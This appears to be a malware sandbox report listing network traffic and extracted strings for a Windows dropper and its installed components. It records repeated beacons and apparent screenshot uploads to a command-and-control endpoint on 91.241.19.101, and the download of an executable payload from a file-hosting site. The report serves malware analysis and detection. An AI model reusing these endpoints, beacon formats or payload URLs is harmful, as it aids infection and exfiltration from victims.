          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----bdc0df1738d21ae343f5b12881503e0eHost: 91.241.19.101Content-Length: 86295Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----bdc0df1738d21ae343f5b12881503e0eHost: 91.241.19.101Content-Length: 86295Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----29afdbb94f80a2306c3816166cb68807Host: 91.241.19.101Content-Length: 86667Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----bdc0df1738d21ae343f5b12881503e0eHost: 91.241.19.101Content-Length: 86295Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----bdc0df1738d21ae343f5b12881503e0eHost: 91.241.19.101Content-Length: 86295Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /llbjiv.exe HTTP/1.0User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko) Accept: */*Host: a.pomf.cat
          Source: libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmp, sqconfig.exe, 00000013.00000000.328551958.000000000186D000.00000002.00020000.sdmp, sqconfig.exe, 00000018.00000000.377941312.000000000186D000.00000002.00020000.sdmpString found in binary or memory: http://.css
          Source: libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmp, sqconfig.exe, 00000013.00000000.328551958.000000000186D000.00000002.00020000.sdmp, sqconfig.exe, 00000018.00000000.377941312.000000000186D000.00000002.00020000.sdmpString found in binary or memory: http://.jpg
          Source: sqconfig.exe, 00000013.00000002.546500569.00000000039D0000.00000004.00000001.sdmpString found in binary or memory: http://91.241.19.101/g7vcSfk
          Source: sqconfig.exe, 00000013.00000002.546553031.00000000039F1000.00000004.00000001.sdmp, sqconfig.exe, 00000013.00000002.546500569.00000000039D0000.00000004.00000001.sdmpString found in binary or memory: http://91.241.19.101/g7vcSfkbDs2/index.php
          Source: sqconfig.exe, 00000013.00000002.546500569.00000000039D0000.00000004.00000001.sdmpString found in binary or memory: http://91.241.19.101/g7vcSfkbDs2/index.php(
          Source: sqconfig.exe, 00000013.00000002.546095216.0000000003650000.00000004.00000001.sdmpString found in binary or memory: http://91.241.19.101/g7vcSfkbDs2/index.php219
          Source: sqconfig.exe, 00000013.00000002.546095216.0000000003650000.00000004.00000001.sdmpString found in binary or memory: http://91.241.19.101/g7vcSfkbDs2/index.php?
          Source: sqconfig.exe, 00000013.00000002.546095216.0000000003650000.00000004.00000001.sdmpString found in binary or memory: http://91.241.19.101/g7vcSfkbDs2/index.php?scr=1
          Source: sqconfig.exe, 00000013.00000002.546500569.00000000039D0000.00000004.00000001.sdmpString found in binary or memory: http://91.241.19.101/g7vcSfkbDs2/index.php?scr=19
          Source: sqconfig.exe, 00000013.00000002.546500569.00000000039D0000.00000004.00000001.sdmpString found in binary or memory: http://91.241.19.101/g7vcSfkbDs2/index.php?scr=197
          Source: sqconfig.exe, 00000013.00000002.546500569.00000000039D0000.00000004.00000001.sdmpString found in binary or memory: http://91.241.19.101/g7vcSfkbDs2/index.php?scr=19A
          Source: sqconfig.exe, 00000013.00000002.546500569.00000000039D0000.00000004.00000001.sdmpString found in binary or memory: http://91.241.19.101/g7vcSfkbDs2/index.php?scr=19s
          Source: sqconfig.exe, 00000013.00000002.546500569.00000000039D0000.00000004.00000001.sdmpString found in binary or memory: http://91.241.19.101/g7vcSfkbDs2/index.php?scr=19y
          Source: sqconfig.exe, 00000013.00000002.546500569.00000000039D0000.00000004.00000001.sdmpString found in binary or memory: http://91.241.19.101/g7vcSfkbDs2/index.php?scr=1SfkbDs2/index.php
          Source: sqconfig.exe, 00000013.00000002.546500569.00000000039D0000.00000004.00000001.sdmpString found in binary or memory: http://91.241.19.101/g7vcSfkbDs2/index.phpibuted
          Source: sqconfig.exe, 00000013.00000002.546500569.00000000039D0000.00000004.00000001.sdmpString found in binary or memory: http://91.241.19.101/g7vcSfkbDs2/index.phpistributed
          Source: sqconfig.exe, 00000013.00000002.546500569.00000000039D0000.00000004.00000001.sdmpString found in binary or memory: http://91.241.19.101/g7vcSfkbDs2/index.phpll32.dll
          Source: sqconfig.exe, 00000013.00000002.546500569.00000000039D0000.00000004.00000001.sdmpString found in binary or memory: http://91.241.19.101/g7vcSfkbDs2/index.phptributed
          Source: Ac372JNTO6.exe, 00000000.00000002.324566267.0000000002223000.00000004.00000001.sdmp, libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmp, is-TILI0.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
          Source: libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmp, is-TILI0.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
          Source: libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmp, is-TILI0.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
          Source: Ac372JNTO6.exe, 00000000.00000002.324566267.0000000002223000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
          Source: Ac372JNTO6.exe, 00000000.00000002.324566267.0000000002223000.00000004.00000001.sdmp, libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmp, is-TILI0.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
          Source: libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmp, is-JU5SL.tmp.14.drString found in binary or memory: http://creativecommons.org/ns#
          Source: libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmpString found in binary or memory: http://creativecommons.org/publicdomain/zero/1.0/
          Source: Ac372JNTO6.exe, 00000000.00000002.327424757.0000000002B1A000.00000004.00000001.sdmp, ssleay32.dll.0.drString found in binary or memory: http://crl.certum.pl/cscasha2.crl0q
          Source: Ac372JNTO6.exe, 00000000.00000002.327424757.0000000002B1A000.00000004.00000001.sdmp, ssleay32.dll.0.drString found in binary or memory: http://crl.certum.pl/ctnca.crl0k
          Source: Ac372JNTO6.exe, 00000000.00000002.327424757.0000000002B1A000.00000004.00000001.sdmp, ssleay32.dll.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
          Source: Ac372JNTO6.exe, 00000000.00000002.324566267.0000000002223000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
          Source: Ac372JNTO6.exe, 00000000.00000002.324566267.0000000002223000.00000004.00000001.sdmp, libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmp, is-TILI0.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
          Source: libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmp, is-TILI0.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
          Source: libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmp, is-TILI0.tmp.14.drString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
          Source: Ac372JNTO6.exe, 00000000.00000002.324566267.0000000002223000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
          Source: Ac372JNTO6.exe, 00000000.00000002.324566267.0000000002223000.00000004.00000001.sdmp, libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmp, is-TILI0.tmp.14.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
          Source: Ac372JNTO6.exe, 00000000.00000002.324566267.0000000002223000.00000004.00000001.sdmp, libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmp, is-TILI0.tmp.14.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
          Source: libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmp, is-TILI0.tmp.14.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
          Source: libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmp, is-TILI0.tmp.14.drString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
          Source: Ac372JNTO6.exe, 00000000.00000002.324566267.0000000002223000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
          Source: Ac372JNTO6.exe, 00000000.00000002.324566267.0000000002223000.00000004.00000001.sdmp, libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmp, is-TILI0.tmp.14.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
          Source: Ac372JNTO6.exe, 00000000.00000002.327424757.0000000002B1A000.00000004.00000001.sdmp, ssleay32.dll.0.drString found in binary or memory: http://cscasha2.ocsp-certum.com04
          Source: libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmp, sqconfig.exe, 00000013.00000000.328551958.000000000186D000.00000002.00020000.sdmp, sqconfig.exe, 00000018.00000000.377941312.000000000186D000.00000002.00020000.sdmpString found in binary or memory: http://html4/loose.dtd
          Source: Ac372JNTO6.exe, 00000000.00000002.324566267.0000000002223000.00000004.00000001.sdmp, libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmp, is-TILI0.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0C
          Source: libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmp, is-TILI0.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0H
          Source: libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmp, is-TILI0.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0I
          Source: Ac372JNTO6.exe, 00000000.00000002.324566267.0000000002223000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0N
          Source: Ac372JNTO6.exe, 00000000.00000002.324566267.0000000002223000.00000004.00000001.sdmp, libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmp, is-TILI0.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0O
          Source: Ac372JNTO6.exe, 00000000.00000002.327424757.0000000002B1A000.00000004.00000001.sdmp, ssleay32.dll.0.drString found in binary or memory: http://ocsp.thawte.com0
          Source: Ac372JNTO6.exe, 00000000.00000002.327424757.0000000002B1A000.00000004.00000001.sdmp, ssleay32.dll.0.drString found in binary or memory: http://repository.certum.pl/cscasha2.cer0
          Source: Ac372JNTO6.exe, 00000000.00000002.327424757.0000000002B1A000.00000004.00000001.sdmp, ssleay32.dll.0.drString found in binary or memory: http://repository.certum.pl/ctnca.cer09
          Source: Ac372JNTO6.exe, 00000000.00000002.327424757.0000000002B1A000.00000004.00000001.sdmp, ssleay32.dll.0.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
          Source: Ac372JNTO6.exe, 00000000.00000002.327424757.0000000002B1A000.00000004.00000001.sdmp, ssleay32.dll.0.drString found in binary or memory: http://s.symcd.com06
          Source: libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmp, is-JU5SL.tmp.14.drString found in binary or memory: http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd
          Source: Ac372JNTO6.exe, 00000000.00000002.327424757.0000000002B1A000.00000004.00000001.sdmp, ssleay32.dll.0.drString found in binary or memory: http://subca.ocsp-certum.com01
          Source: Ac372JNTO6.exe, 00000000.00000002.327424757.0000000002B1A000.00000004.00000001.sdmp, ssleay32.dll.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
          Source: Ac372JNTO6.exe, 00000000.00000002.327424757.0000000002B1A000.00000004.00000001.sdmp, ssleay32.dll.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
          Source: Ac372JNTO6.exe, 00000000.00000002.327424757.0000000002B1A000.00000004.00000001.sdmp, ssleay32.dll.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
          Source: Ac372JNTO6.exe, 00000000.00000002.327424757.0000000002B1A000.00000004.00000001.sdmp, ssleay32.dll.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
          Source: Ac372JNTO6.exe, 00000000.00000002.327424757.0000000002B1A000.00000004.00000001.sdmp, ssleay32.dll.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
          Source: Ac372JNTO6.exe, 00000000.00000002.327424757.0000000002B1A000.00000004.00000001.sdmp, ssleay32.dll.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
          Source: libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmp, is-JAV07.tmp.14.drString found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
          Source: Ac372JNTO6.exe, 00000000.00000002.327424757.0000000002B1A000.00000004.00000001.sdmp, ssleay32.dll.0.drString found in binary or memory: http://www.certum.pl/CPS0
          Source: Ac372JNTO6.exe, 00000000.00000002.324566267.0000000002223000.00000004.00000001.sdmp, libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmp, is-TILI0.tmp.14.drString found in binary or memory: http://www.digicert.com/CPS0
          Source: libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmp, is-TILI0.tmp.14.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
          Source: Ac372JNTO6.exe, 00000000.00000002.327982740.000000001000E000.00000002.00020000.sdmpString found in binary or memory: http://www.gentee.comB
          Source: libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmp, is-JU5SL.tmp.14.drString found in binary or memory: http://www.inkscape.org/)
          Source: libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmp, is-JU5SL.tmp.14.drString found in binary or memory: http://www.inkscape.org/namespaces/inkscape
          Source: Ac372JNTO6.exe, 00000000.00000002.327424757.0000000002B1A000.00000004.00000001.sdmp, ssleay32.dll.0.drString found in binary or memory: http://www.openssl.org/f
          Source: Ac372JNTO6.exe, 00000000.00000002.326145316.0000000002636000.00000004.00000001.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html
          Source: libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmp, sqconfig.exe, 00000013.00000002.545671110.0000000001C20000.00000002.00020000.sdmp, sqconfig.exe, 00000018.00000002.401251302.0000000001C20000.00000002.00020000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.htmldB
          Source: Ac372JNTO6.exe, 00000000.00000002.326145316.0000000002636000.00000004.00000001.sdmpString found in binary or memory: https://a.pomf.cat/llbjiv.exe
          Source: Ac372JNTO6.exe, 00000000.00000002.326145316.0000000002636000.00000004.00000001.sdmpString found in binary or memory: https://a.pomf.cat/llbjiv.exe#setuppath#libupdate.exe0
          Source: Ac372JNTO6.exe, 00000000.00000002.325694255.000000000252B000.00000004.00000001.sdmpString found in binary or memory: https://a.pomf.cat/llbjiv.exe.
          Source: libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmpString found in binary or memory: https://bootswatch.com
          Source: libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmpString found in binary or memory: https://creativecommons.org/licenses/by/4.0/)
          Source: Ac372JNTO6.exe, 00000000.00000002.327424757.0000000002B1A000.00000004.00000001.sdmp, ssleay32.dll.0.drString found in binary or memory: https://d.symcb.com/cps0%
          Source: Ac372JNTO6.exe, 00000000.00000002.327424757.0000000002B1A000.00000004.00000001.sdmp, ssleay32.dll.0.drString found in binary or memory: https://d.symcb.com/rpa0
          Source: Ac372JNTO6.exe, 00000000.00000002.327424757.0000000002B1A000.00000004.00000001.sdmp, ssleay32.dll.0.drString found in binary or memory: https://d.symcb.com/rpa0.
          Source: libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmpString found in binary or memory: https://fontawesome.com
          Source: libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmpString found in binary or memory: https://fontawesome.com/license/free.
          Source: libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmpString found in binary or memory: https://fontawesome.comhttps://fontawesome.comFont
          Source: libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmpString found in binary or memory: https://getbootstrap.com/)
          Source: libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmpString found in binary or memory: https://github.com/twbs/bootstrap/blob/main/LICENSE)
          Source: libupdate.exeString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdline
          Source: libupdate.exe, 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, libupdate.exe, 0000000C.00000000.314861540.0000000000401000.00000020.00020000.sdmpString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
          Source: Ac372JNTO6.exe, 00000000.00000002.326145316.0000000002636000.00000004.00000001.sdmpString found in binary or memory: https://mousejiggler.org
          Source: Ac372JNTO6.exe, 00000000.00000002.326145316.0000000002636000.00000004.00000001.sdmpString found in binary or memory: https://mousejiggler.orgLanglistEnglish
          Source: Ac372JNTO6.exe, 00000000.00000002.324566267.0000000002223000.00000004.00000001.sdmpString found in binary or memory: https://notepad-plus-plus.org/0
          Source: libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmpString found in binary or memory: https://openclipart.org/detail/188214/eraser-by-crisg-188214U2
          Source: libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmpString found in binary or memory: https://opensource.org/licenses/MIT)
          Source: libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmpString found in binary or memory: https://scripts.sil.org/OFL)
          Source: Ac372JNTO6.exe, 00000000.00000002.327424757.0000000002B1A000.00000004.00000001.sdmp, ssleay32.dll.0.drString found in binary or memory: https://www.certum.pl/CPS0
          Source: Ac372JNTO6.exe, 00000000.00000002.324566267.0000000002223000.00000004.00000001.sdmp, libupdate.tmp, 0000000E.00000003.330135060.0000000005442000.00000004.00000001.sdmp, is-TILI0.tmp.14.drString found in binary or memory: https://www.digicert.com/CPS0
          Source: is-TILI0.tmp.14.drString found in binary or memory: https://www.ekransystem.com
          Source: libupdate.tmp, libupdate.tmp, 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmpString found in binary or memory: https://www.innosetup.com/
          Source: libupdate.tmpString found in binary or memory: https://www.remobjects.com/ps
          Source: is-Q8TJ0.tmp.14.drString found in binary or memory: https://www.tupitube.com
          Source: unknownDNS traffic detected: queries for: a.pomf.cat
          Source: C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exeCode function: 19_2_013C6950 InternetCloseHandle,Sleep,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,19_2_013C6950
          Source: global trafficHTTP traffic detected: GET /llbjiv.exe HTTP/1.0User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko) Accept: */*Host: a.pomf.cat
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
          Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
          Source: unknownTCP traffic detected without corresponding DNS query: 91.241.19.101
          Source: unknownTCP traffic detected without corresponding DNS query: 91.241.19.101
          Source: unknownTCP traffic detected without corresponding DNS query: 91.241.19.101
          Source: unknownTCP traffic detected without corresponding DNS query: 91.241.19.101
          Source: unknownTCP traffic detected without corresponding DNS query: 91.241.19.101
          Source: unknownTCP traffic detected without corresponding DNS query: 91.241.19.101
          Source: unknownTCP traffic detected without corresponding DNS query: 91.241.19.101
          Source: unknownTCP traffic detected without corresponding DNS query: 91.241.19.101
          Source: unknownTCP traffic detected without corresponding DNS query: 91.241.19.101
          Source: unknownTCP traffic detected without corresponding DNS query: 91.241.19.101
          Source: unknownTCP traffic detected without corresponding DNS query: 91.241.19.101
          Source: unknownTCP traffic detected without corresponding DNS query: 91.241.19.101
          Source: unknownTCP traffic detected without corresponding DNS query: 91.241.19.101
          Source: unknownTCP traffic detected without corresponding DNS query: 91.241.19.101
          Source: unknownTCP traffic detected without corresponding DNS query: 91.241.19.101
          Source: unknownTCP traffic detected without corresponding DNS query: 91.241.19.101
          Source: unknownTCP traffic detected without corresponding DNS query: 91.241.19.101
          Source: unknownTCP traffic detected without corresponding DNS query: 91.241.19.101
          Source: unknownTCP traffic detected without corresponding DNS query: 91.241.19.101
          Source: unknownTCP traffic detected without corresponding DNS query: 91.241.19.101
          Source: unknownTCP traffic detected without corresponding DNS query: 91.241.19.101
          Source: unknownHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----a925bc230fdbeec72a266ea97d6eb24eHost: 91.241.19.101Content-Length: 86299Cache-Control: no-cache
          Source: unknownHTTPS traffic detected: 69.39.225.3:443 -> 192.168.2.3:49756 version: TLS 1.2
